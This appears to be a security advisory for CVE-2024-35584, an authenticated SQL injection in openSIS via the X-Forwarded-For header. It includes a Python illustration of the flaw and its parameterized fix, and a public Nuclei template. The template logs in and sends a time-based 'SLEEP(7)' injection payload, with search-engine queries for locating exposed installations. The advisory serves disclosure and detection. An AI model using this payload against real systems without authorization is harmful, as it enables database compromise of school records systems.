CVE-2024-35584: openSIS < 9.1 - SQL Injection

Date: 2025-08-01 | Affected software: openSIS | PoC: public

Vulnerability description

SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php and functions/HackingLogFnc.php in openSIS Community Edition 9.1, 8.0, and possibly earlier versions. An authenticated user can perform SQL injection due to the lack of sanitisation: the application takes an arbitrary value from the "X-Forwarded-For" header and appends it directly to a SQL INSERT statement, leading to SQL injection.
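As an added illustration (not openSIS code), the concatenation pattern the advisory describes next to a hardened equivalent, written in Python against an in-memory SQLite table; the table and column names, and the sample header values, are assumed.

```python
import ipaddress
import sqlite3

# Constructed sample header values (not captured from a real request).
NORMAL_XFF = "203.0.113.7, 10.0.0.1"
MALICIOUS_XFF = "122.122.122.122' AND SLEEP(7) AND '1'='1"

# Assumed schema standing in for the application's hacking-log table.
SCHEMA = ("CREATE TABLE IF NOT EXISTS hacking_log "
          "(id INTEGER PRIMARY KEY, ip_address TEXT, request TEXT)")


def vulnerable_query(xff: str, request: str) -> str:
    """The unsafe pattern: header text spliced straight into the INSERT."""
    return ("INSERT INTO hacking_log (ip_address, request) VALUES ('"
            + xff + "', '" + request + "')")


def client_ip_from_xff(header):
    """Take the left-most X-Forwarded-For entry; accept it only if it is a literal IP."""
    if not header:
        return None
    first = header.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first))
    except ValueError:
        return None  # anything that is not an IP address is dropped, not stored


def safe_log(conn, xff, request):
    """Hardened form: validated value, bound through a placeholder."""
    ip = client_ip_from_xff(xff)
    conn.execute("INSERT INTO hacking_log (ip_address, request) VALUES (?, ?)",
                 (ip, request))
    conn.commit()
    return ip


def logged_ips(conn):
    return [row[0] for row in conn.execute(
        "SELECT ip_address FROM hacking_log ORDER BY id")]


def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    unsafe_sql = vulnerable_query(MALICIOUS_XFF, "/Ajax.php")
    try:
        conn.execute(unsafe_sql)
        reached_engine = False
    except sqlite3.OperationalError:
        reached_engine = True  # SQLite has no SLEEP(): the header was parsed as SQL
    safe_log(conn, NORMAL_XFF, "/Ajax.php")
    safe_log(conn, MALICIOUS_XFF, "/Ajax.php")
    return reached_engine, logged_ips(conn)
```

Binding the value with a placeholder is the fix; validating the header as an IP is defence in depth, since X-Forwarded-For is fully client-controlled.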

PoC code [public]

id: CVE-2024-35584

info:
  name: openSIS < 9.1 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection.
  reference:
    - https://www.tenable.com/cve/CVE-2024-35584
    - https://vuldb.com/?id.280406
    - https://github.com/whwhwh96/CVE-2024-35584
    - https://github.com/OS4ED/openSIS-Classic
    - http://opensis.com
    - https://nvd.nist.gov/vuln/detail/CVE-2024-35584
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-35584
    cwe-id: CWE-89
    epss-score: 0.72757
    epss-percentile: 0.98736
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query: http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2024,opensis,authenticated,sqli

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        @timeout 20s
        GET /Ajax.php?modname=tools/notallowed.php HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1

    matchers:
      - type: dsl
        dsl:
          - duration_2>=7
          - contains(body_1, "openSIS") && contains_all(body_2, "donetext:", "\'Done\'")
          - status_code_1 == 200 && status_code_2 == 200
        condition: and
# digest: 4b0a00483046022100ec7818884e4f5c54ca88b416381f652889bdf9ec2e488b2a98e9ed95012d243b022100f30ad5dab4d09265fa0f072f22e705604f22a1ab82a21a116526d753703db9f5:922c64590222798bb761d5b6d8e72950
